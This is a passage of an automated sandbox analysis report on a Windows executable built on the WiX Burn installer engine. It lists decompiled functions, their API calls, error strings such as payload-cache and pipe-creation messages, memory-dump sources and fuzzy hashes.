                                                                                                                                                                  • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0096DAC1
                                                                                                                                                                  • CreateWellKnownSid.ADVAPI32(0000001A,00000000,?,?), ref: 0096DB19
                                                                                                                                                                  • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0096DB23
                                                                                                                                                                  • CreateWellKnownSid.ADVAPI32(00000017,00000000,?,?), ref: 0096DB71
                                                                                                                                                                  • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0096DB7B
                                                                                                                                                                  • CreateWellKnownSid.ADVAPI32(00000018,00000000,?,?), ref: 0096DBCC
                                                                                                                                                                  • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0096DBD6
                                                                                                                                                                  • CreateWellKnownSid.ADVAPI32(00000010,00000000,?,?), ref: 0096DC27
                                                                                                                                                                  • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0096DC31
                                                                                                                                                                  • CreateWellKnownSid.ADVAPI32(00000016,00000000,?,?), ref: 0096DC82
                                                                                                                                                                  • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0096DC8C
                                                                                                                                                                  • SetEntriesInAclA.ADVAPI32(00000005,?,00000000,?), ref: 0096DD8E
                                                                                                                                                                  • SetSecurityDescriptorOwner.ADVAPI32(?,?,00000000), ref: 0096DDD9
                                                                                                                                                                  • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0096DDE3
                                                                                                                                                                  • SetSecurityDescriptorGroup.ADVAPI32(?,?,00000000), ref: 0096DE2C
                                                                                                                                                                  • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0096DE36
                                                                                                                                                                  • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 0096DE80
                                                                                                                                                                  • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0096DE8A
                                                                                                                                                                  • CoInitializeSecurity.OLE32(?,000000FF,00000000,00000000,00000006,00000002,00000000,00003000,00000000), ref: 0096DED9
                                                                                                                                                                  • LocalFree.KERNEL32(00000000), ref: 0096DF10
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000001.00000002.1489653220.0000000000911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
                                                                                                                                                                  • Associated: 00000001.00000002.1489628230.0000000000910000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489717022.000000000097E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489752425.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489778440.00000000009AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489778440.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_1_2_910000_kXzODlqJak.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: ErrorLast$CreateKnownSecurityWell$Descriptor$Initialize$DaclEntriesFreeGroupLocalOwner
                                                                                                                                                                  • String ID: Failed to create ACL for system restore.$Failed to create administrator SID for system restore.$Failed to create local service SID for system restore.$Failed to create local system SID for system restore.$Failed to create network service SID for system restore.$Failed to create self SID for system restore.$Failed to initialize COM security for system restore.$Failed to initialize security descriptor for system restore.$Failed to set DACL for system restore.$Failed to set administrators group access for system restore.$Failed to set administrators owner for system restore.$d:\a\wix4\wix4\src\libs\dutil\wixtoolset.dutil\srputil.cpp
                                                                                                                                                                  • API String ID: 267631441-1154305825
                                                                                                                                                                  • Opcode ID: 3bfd2c9a6ca478dbb751a639ebcbe8dc9c646b1f8856964f03f08357377e165f
                                                                                                                                                                  • Instruction ID: 2de113902f0f895eae27fc4a822d3f65efa13ed454567a64e1774b2ee5fc0db4
                                                                                                                                                                  • Opcode Fuzzy Hash: 3bfd2c9a6ca478dbb751a639ebcbe8dc9c646b1f8856964f03f08357377e165f
                                                                                                                                                                  • Instruction Fuzzy Hash: EDD1B472E4523DABD7309F958C49FDFBABCAF89710F01459AA918F7250D6748D80CAE0
                                                                                                                                                                  Function 0092BB84 Relevance: 40.5, APIs: 11, Strings: 12, Instructions: 249pipeCOMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  • ConvertStringSecurityDescriptorToSecurityDescriptorW.ADVAPI32(D:(A;;GA;;;SY)(A;;GA;;;BA)(A;;GRGW0x00100000;;;WD),00000001,00916CF2,00000000), ref: 0092BBB4
                                                                                                                                                                  • GetLastError.KERNEL32(009173DE,00000000,00916CF2,00000000,00000000,000000B0,?,?,00916CF2,00000000,00000000), ref: 0092BBBD
                                                                                                                                                                  • CreateNamedPipeW.KERNEL32(00000000,00080003,00000000,00000001,00010000,00010000,00000001,00916CF2,009173DE,00000000,00916CF2,00000000,00000000,000000B0), ref: 0092BC7D
                                                                                                                                                                  • GetLastError.KERNEL32(?,?,00916CF2,00000000,00000000), ref: 0092BC8B
                                                                                                                                                                  • CreateNamedPipeW.KERNEL32(00000000,00080003,00000000,00000001,00010000,00010000,00000001,00000000), ref: 0092BD32
                                                                                                                                                                  • GetLastError.KERNEL32 ref: 0092BD3F
                                                                                                                                                                  • CreateNamedPipeW.KERNEL32(00000000,00080003,00000000,00000001,00010000,00010000,00000001,00000000), ref: 0092BDCE
                                                                                                                                                                  • GetLastError.KERNEL32 ref: 0092BDD9
                                                                                                                                                                  • CloseHandle.KERNEL32(00000000,?,?,?,?,d:\a\wix4\wix4\src\burn\engine\pipe.cpp,0000012D,00000000), ref: 0092BE27
                                                                                                                                                                  • CloseHandle.KERNEL32(00000000,?,?,?,?,d:\a\wix4\wix4\src\burn\engine\pipe.cpp,0000012D,00000000), ref: 0092BE31
                                                                                                                                                                  • LocalFree.KERNEL32(00000000), ref: 0092BE5F
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000001.00000002.1489653220.0000000000911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
                                                                                                                                                                  • Associated: 00000001.00000002.1489628230.0000000000910000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489717022.000000000097E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489752425.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489778440.00000000009AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489778440.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_1_2_910000_kXzODlqJak.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: ErrorLast$CreateNamedPipe$CloseDescriptorHandleSecurity$ConvertFreeLocalString
                                                                                                                                                                  • String ID: D:(A;;GA;;;SY)(A;;GA;;;BA)(A;;GRGW0x00100000;;;WD)$Failed to allocate full name of cache pipe: %ls$Failed to allocate full name of logging pipe: %ls$Failed to allocate full name of pipe: %ls$Failed to create cache pipe: %ls$Failed to create logging pipe: %ls$Failed to create pipe: %ls$Failed to create the security descriptor for the connection event and pipe.$\\.\pipe\%ls$\\.\pipe\%ls.Cache$\\.\pipe\%ls.Log$d:\a\wix4\wix4\src\burn\engine\pipe.cpp
                                                                                                                                                                  • API String ID: 2306725211-2819417629
                                                                                                                                                                  • Opcode ID: bcf4de08e5bdb93a7ff81f9ac8f0f522a46e695169b8f98e84b057e1d6da7612
                                                                                                                                                                  • Instruction ID: f0b507844e66b6b387d21b08e9de9f5251188e3c16aaf9d387661083ca2ba0bb
                                                                                                                                                                  • Opcode Fuzzy Hash: bcf4de08e5bdb93a7ff81f9ac8f0f522a46e695169b8f98e84b057e1d6da7612
                                                                                                                                                                  • Instruction Fuzzy Hash: BB710972E80239B7DB21AA549C46FEE7BB8AF04B14F110515FF14BA2D1E3B55D409790
                                                                                                                                                                  Function 0096A2D0 Relevance: 37.0, APIs: 14, Strings: 7, Instructions: 207encryptionfileCOMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  • CryptAcquireContextW.ADVAPI32(?,00000000,00000000,?,F0000040,?,?,?,?,?,?), ref: 0096A335
                                                                                                                                                                  • GetLastError.KERNEL32(?,?), ref: 0096A33F
                                                                                                                                                                  • CryptCreateHash.ADVAPI32(?,?,00000000,00000000,?,?,?), ref: 0096A38D
                                                                                                                                                                  • GetLastError.KERNEL32(?,?), ref: 0096A397
                                                                                                                                                                  • CryptHashData.ADVAPI32(?,?,?,00000000,?,?), ref: 0096A3F2
                                                                                                                                                                  • ReadFile.KERNEL32(?,?,00001000,?,00000000,?,?), ref: 0096A416
                                                                                                                                                                  • GetLastError.KERNEL32(?,?), ref: 0096A420
                                                                                                                                                                  • CryptDestroyHash.ADVAPI32(00000000), ref: 0096A473
                                                                                                                                                                  • CryptReleaseContext.ADVAPI32(00000000,00000000), ref: 0096A48A
                                                                                                                                                                  • GetLastError.KERNEL32(?,?), ref: 0096A4A3
                                                                                                                                                                  • CryptGetHashParam.ADVAPI32(?,00000002,?,?,00000000,?,?), ref: 0096A4EF
                                                                                                                                                                  • GetLastError.KERNEL32(?,?), ref: 0096A4F9
                                                                                                                                                                  • SetFilePointerEx.KERNEL32(?,00000000,00000000,0000800E,00000001,?,?), ref: 0096A543
                                                                                                                                                                  • GetLastError.KERNEL32(?,?), ref: 0096A551
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000001.00000002.1489653220.0000000000911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
                                                                                                                                                                  • Associated: 00000001.00000002.1489628230.0000000000910000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489717022.000000000097E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489752425.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489778440.00000000009AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489778440.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_1_2_910000_kXzODlqJak.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: CryptErrorLast$Hash$ContextFile$AcquireCreateDataDestroyParamPointerReadRelease
                                                                                                                                                                  • String ID: Failed to acquire crypto context.$Failed to get file pointer.$Failed to get hash value.$Failed to hash data block.$Failed to initiate hash.$Failed to read data block.$d:\a\wix4\wix4\src\libs\dutil\wixtoolset.dutil\cryputil.cpp
                                                                                                                                                                  • API String ID: 3955742341-696376830
                                                                                                                                                                  • Opcode ID: 0990cb4430f4729cae7cfa48a487bcb33088b0db010ec4f6cccadc373580d53a
                                                                                                                                                                  • Instruction ID: 68f6c59818ad10a62f6b2c61563e1daec72350ce5e7d2442ca7375984e912360
                                                                                                                                                                  • Opcode Fuzzy Hash: 0990cb4430f4729cae7cfa48a487bcb33088b0db010ec4f6cccadc373580d53a
                                                                                                                                                                  • Instruction Fuzzy Hash: C7610C33E002397BD7318A548C49BEE76ACAF48755F0140A5BE49F72A1E7B48C809FE1
                                                                                                                                                                  Function 0097699C Relevance: 22.9, APIs: 8, Strings: 5, Instructions: 116COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  • FindResourceExA.KERNEL32(?,0000000A,?,00000000), ref: 009769AD
                                                                                                                                                                  • GetLastError.KERNEL32(?,0093D16B,?,00000001,?,?), ref: 009769B9
                                                                                                                                                                  • LoadResource.KERNEL32(?,00000000,?,0093D16B,?,00000001,?,?), ref: 00976A06
                                                                                                                                                                  • GetLastError.KERNEL32(?,0093D16B,?,00000001,?,?), ref: 00976A12
                                                                                                                                                                  • SizeofResource.KERNEL32(?,00000000,?,0093D16B,?,00000001,?,?), ref: 00976A4D
                                                                                                                                                                  • GetLastError.KERNEL32(?,0093D16B,?,00000001,?,?), ref: 00976A59
                                                                                                                                                                  • LockResource.KERNEL32(00000000,?,0093D16B,?,00000001,?,?), ref: 00976A94
                                                                                                                                                                  • GetLastError.KERNEL32(?,0093D16B,?,00000001,?,?), ref: 00976AA5
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000001.00000002.1489653220.0000000000911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
                                                                                                                                                                  • Associated: 00000001.00000002.1489628230.0000000000910000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489717022.000000000097E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489752425.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489778440.00000000009AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489778440.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_1_2_910000_kXzODlqJak.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: ErrorLastResource$FindLoadLockSizeof
                                                                                                                                                                  • String ID: Failed to find resource.$Failed to get size of resource.$Failed to load resource.$Failed to lock data resource.$d:\a\wix4\wix4\src\libs\dutil\wixtoolset.dutil\resrutil.cpp
                                                                                                                                                                  • API String ID: 2627587518-3856033167
                                                                                                                                                                  • Opcode ID: cb4ed5ae37fbb9e9ed5cc72d5ff246338589fd92973bd98cd0f071bbac9d5e78
                                                                                                                                                                  • Instruction ID: f4f1dd3b070aa0cada54f0ebeaec0766ce9b0f4ace931f2d67bbd59d24380edc
                                                                                                                                                                  • Opcode Fuzzy Hash: cb4ed5ae37fbb9e9ed5cc72d5ff246338589fd92973bd98cd0f071bbac9d5e78
                                                                                                                                                                  • Instruction Fuzzy Hash: 5D312577A51A3A77D3214A548C49F6B6D6CEB89B60F06C029FE1DFB391E634CC0096E1
                                                                                                                                                                  Function 0092EA4B Relevance: 21.2, APIs: 1, Strings: 11, Instructions: 222COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  Strings
                                                                                                                                                                  • Failed to reset permissions on unverified cached payload: %ls, xrefs: 0092EBBC
                                                                                                                                                                  • moving, xrefs: 0092EC25, 0092EC32
                                                                                                                                                                  • Failed to get cached path for package with cache id: %ls, xrefs: 0092EA7F
                                                                                                                                                                  • Failed to verify payload: %ls at path: %ls, xrefs: 0092EC0A
                                                                                                                                                                  • Failed to create unverified path., xrefs: 0092EAD8
                                                                                                                                                                  • Aborted transferring working path to unverified path for payload: %ls., xrefs: 0092EB92
                                                                                                                                                                  • Failed to find payload: %ls in working path: %ls and unverified path: %ls, xrefs: 0092ECA9
                                                                                                                                                                  • Failed to transfer working path to unverified path for payload: %ls., xrefs: 0092EB31
                                                                                                                                                                  • d:\a\wix4\wix4\src\burn\engine\cache.cpp, xrefs: 0092EA91, 0092EAEA, 0092EC97, 0092ECBB
                                                                                                                                                                  • copying, xrefs: 0092EC2C
                                                                                                                                                                  • Failed to move verified file to complete payload path: %ls, xrefs: 0092EC6A
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000001.00000002.1489653220.0000000000911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
                                                                                                                                                                  • Associated: 00000001.00000002.1489628230.0000000000910000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489717022.000000000097E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489752425.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489778440.00000000009AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489778440.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_1_2_910000_kXzODlqJak.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID:
                                                                                                                                                                  • String ID: Aborted transferring working path to unverified path for payload: %ls.$Failed to create unverified path.$Failed to find payload: %ls in working path: %ls and unverified path: %ls$Failed to get cached path for package with cache id: %ls$Failed to move verified file to complete payload path: %ls$Failed to reset permissions on unverified cached payload: %ls$Failed to transfer working path to unverified path for payload: %ls.$Failed to verify payload: %ls at path: %ls$copying$d:\a\wix4\wix4\src\burn\engine\cache.cpp$moving
                                                                                                                                                                  • API String ID: 0-1123430254
                                                                                                                                                                  • Opcode ID: 5f3611104e9fd5b30349c9053bf48db534351cf02b690febe4e3a677489dface
                                                                                                                                                                  • Instruction ID: dce725eb87e978a1e1137fef75206b689dd3750eb4b3db793e42b8129e871fd8
                                                                                                                                                                  • Opcode Fuzzy Hash: 5f3611104e9fd5b30349c9053bf48db534351cf02b690febe4e3a677489dface
                                                                                                                                                                  • Instruction Fuzzy Hash: 8F717432680229BBEF23AE90DC46FDE7E25BF58B54F150100FB44791E1D7B2D960AB94
                                                                                                                                                                  Function 0096B884 Relevance: 21.1, APIs: 8, Strings: 4, Instructions: 128COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  • LookupPrivilegeValueW.ADVAPI32(00000000,?,?), ref: 0096B8BC
                                                                                                                                                                  • GetLastError.KERNEL32 ref: 0096B8C6
                                                                                                                                                                  • OpenProcessToken.ADVAPI32(?,00000020,?), ref: 0096B91A
                                                                                                                                                                  • GetLastError.KERNEL32 ref: 0096B924
                                                                                                                                                                  • AdjustTokenPrivileges.ADVAPI32(00000000,00000000,00000001,00000010,00000000,00000000), ref: 0096B976
                                                                                                                                                                  • GetLastError.KERNEL32 ref: 0096B980
                                                                                                                                                                  • GetLastError.KERNEL32 ref: 0096B9C4
                                                                                                                                                                  • CloseHandle.KERNEL32(00000000), ref: 0096B9DD
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000001.00000002.1489653220.0000000000911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
                                                                                                                                                                  • Associated: 00000001.00000002.1489628230.0000000000910000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489717022.000000000097E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489752425.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489778440.00000000009AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489778440.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_1_2_910000_kXzODlqJak.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: ErrorLast$Token$AdjustCloseHandleLookupOpenPrivilegePrivilegesProcessValue
                                                                                                                                                                  • String ID: Failed to adjust token to add privilege: %ls$Failed to get privilege LUID: %ls$Failed to get process token to adjust privileges.$d:\a\wix4\wix4\src\libs\dutil\wixtoolset.dutil\procutil.cpp
                                                                                                                                                                  • API String ID: 1766547789-2883319381
                                                                                                                                                                  • Opcode ID: be161ca2d7868b003687f5d78adb511a5b9f880aacb02f24b504d602bd5123d1
                                                                                                                                                                  • Instruction ID: 37b8cb028486c8049c7a0ca3020caddadb80d73f7ace3d1c71c89e4254ca1029
                                                                                                                                                                  • Opcode Fuzzy Hash: be161ca2d7868b003687f5d78adb511a5b9f880aacb02f24b504d602bd5123d1
                                                                                                                                                                  • Instruction Fuzzy Hash: 9C419172E5123977E7209B558C4AFBF7AACEF49B58F010515BE04FB290E3748D809AE0
                                                                                                                                                                  Function 0092DB8F Relevance: 17.7, APIs: 4, Strings: 6, Instructions: 199fileCOMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  • CreateFileW.KERNEL32(?,80000000,00000005,00000000,00000003,08000000,00000000), ref: 0092DBAC
                                                                                                                                                                  • GetLastError.KERNEL32 ref: 0092DBBF
                                                                                                                                                                  • DecryptFileW.ADVAPI32(?,00000000), ref: 0092DD92
                                                                                                                                                                  • CloseHandle.KERNEL32(?), ref: 0092DDA1
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000001.00000002.1489653220.0000000000911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
                                                                                                                                                                  • Associated: 00000001.00000002.1489628230.0000000000910000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489717022.000000000097E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489752425.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489778440.00000000009AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489778440.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_1_2_910000_kXzODlqJak.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: File$CloseCreateDecryptErrorHandleLast
                                                                                                                                                                  • String ID: Failed to open payload at path: %ls$Failed to verify file size for path: %ls$Failed to verify hash of payload: %ls$Failed to verify signature of payload: %ls$Payload has no verification information: %ls$d:\a\wix4\wix4\src\burn\engine\cache.cpp
                                                                                                                                                                  • API String ID: 3262865546-780857860
                                                                                                                                                                  • Opcode ID: 63bb263bbe1d19093c62ac12d282ae71ee816c15a547843cfda9fab2600c448f
                                                                                                                                                                  • Instruction ID: cf3718beff216e9ac64dc3314dad2413091337b1f123b7226323aacb3d425d08
                                                                                                                                                                  • Opcode Fuzzy Hash: 63bb263bbe1d19093c62ac12d282ae71ee816c15a547843cfda9fab2600c448f
                                                                                                                                                                  • Instruction Fuzzy Hash: E2514A32681B36BBEB225E64AC0AFAB3A2DFF44710F140604FA05755D0D3A59C60DBE0
                                                                                                                                                                  Function 009194F0 Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 138COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  Strings
                                                                                                                                                                  • Failed to set variant value., xrefs: 00919650
                                                                                                                                                                  • Failed to get OS info., xrefs: 00919544
                                                                                                                                                                  • d:\a\wix4\wix4\src\burn\engine\variable.cpp, xrefs: 00919662
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000001.00000002.1489653220.0000000000911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
                                                                                                                                                                  • Associated: 00000001.00000002.1489628230.0000000000910000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489717022.000000000097E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489752425.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489778440.00000000009AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489778440.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_1_2_910000_kXzODlqJak.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: FreeLibrary
                                                                                                                                                                  • String ID: Failed to get OS info.$Failed to set variant value.$d:\a\wix4\wix4\src\burn\engine\variable.cpp
                                                                                                                                                                  • API String ID: 3664257935-2618661516
                                                                                                                                                                  • Opcode ID: 3806c2720460aa805944c26b2ac5ae5b6384adfd91f5b096ff0dc4f498c2f1a0
                                                                                                                                                                  • Instruction ID: 56d7c102595205ec76589b926cb9ba2158c1221ec7891416d50600cc6e5f9ccd
                                                                                                                                                                  • Opcode Fuzzy Hash: 3806c2720460aa805944c26b2ac5ae5b6384adfd91f5b096ff0dc4f498c2f1a0
                                                                                                                                                                  • Instruction Fuzzy Hash: 2C41E471B0521CBBDB118B69CC5AFEE7AB8EB49744F400599F549EB180D274DAC0CBA0
                                                                                                                                                                  Function 0092DA0E Relevance: 14.1, APIs: 4, Strings: 4, Instructions: 126fileCOMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  • CreateFileW.KERNEL32(?,80000000,00000005,00000000,00000003,08000000,00000000), ref: 0092DA2B
                                                                                                                                                                  • GetLastError.KERNEL32 ref: 0092DA3E
                                                                                                                                                                  • DecryptFileW.ADVAPI32(?,00000000), ref: 0092DB3F
                                                                                                                                                                  • CloseHandle.KERNEL32(?,?,?,?,?,00000001,?,00000000,?,?,?,?), ref: 0092DB4E
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000001.00000002.1489653220.0000000000911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
                                                                                                                                                                  • Associated: 00000001.00000002.1489628230.0000000000910000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489717022.000000000097E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489752425.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489778440.00000000009AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489778440.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_1_2_910000_kXzODlqJak.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: File$CloseCreateDecryptErrorHandleLast
                                                                                                                                                                  • String ID: Container has no verification information: %ls$Failed to open container at path: %ls$Failed to verify hash of container: %ls$d:\a\wix4\wix4\src\burn\engine\cache.cpp
                                                                                                                                                                  • API String ID: 3262865546-1184176504
                                                                                                                                                                  • Opcode ID: 00bb887e8094afe10ace4d48e1ea9e4187855bf5c94acf1d04ee54fca42d5ca6
                                                                                                                                                                  • Instruction ID: bb5df6d035f67ac675859388842b5235100e5bdc5f78074597c51e6df0b743d5
                                                                                                                                                                  • Opcode Fuzzy Hash: 00bb887e8094afe10ace4d48e1ea9e4187855bf5c94acf1d04ee54fca42d5ca6
                                                                                                                                                                  • Instruction Fuzzy Hash: 01316032781335B7EB326A58AC5BF9E3618EF44714F110100FB157A1D0D3E49D60DAD1
                                                                                                                                                                  Function 0094EC05 Relevance: 13.0, Strings: 10, Instructions: 543COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000001.00000002.1489653220.0000000000911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
                                                                                                                                                                  • Associated: 00000001.00000002.1489628230.0000000000910000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489717022.000000000097E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489752425.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489778440.00000000009AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489778440.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_1_2_910000_kXzODlqJak.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID:
                                                                                                                                                                  • String ID: BA aborted cache acquire begin.$BA aborted cache acquire resolving.$Failed to compare '%ls' to '%ls'.$Failed to copy payload: %ls$Failed to determine if payload paths were equivalent, source: %ls, destination: %ls.$Failed to download payload: %ls$Failed to extract container for payload: %ls$Failed to resolve source, payload: %ls, package: %ls, container: %ls$Failed to search local source.$d:\a\wix4\wix4\src\burn\engine\apply.cpp
                                                                                                                                                                  • API String ID: 0-1652660176
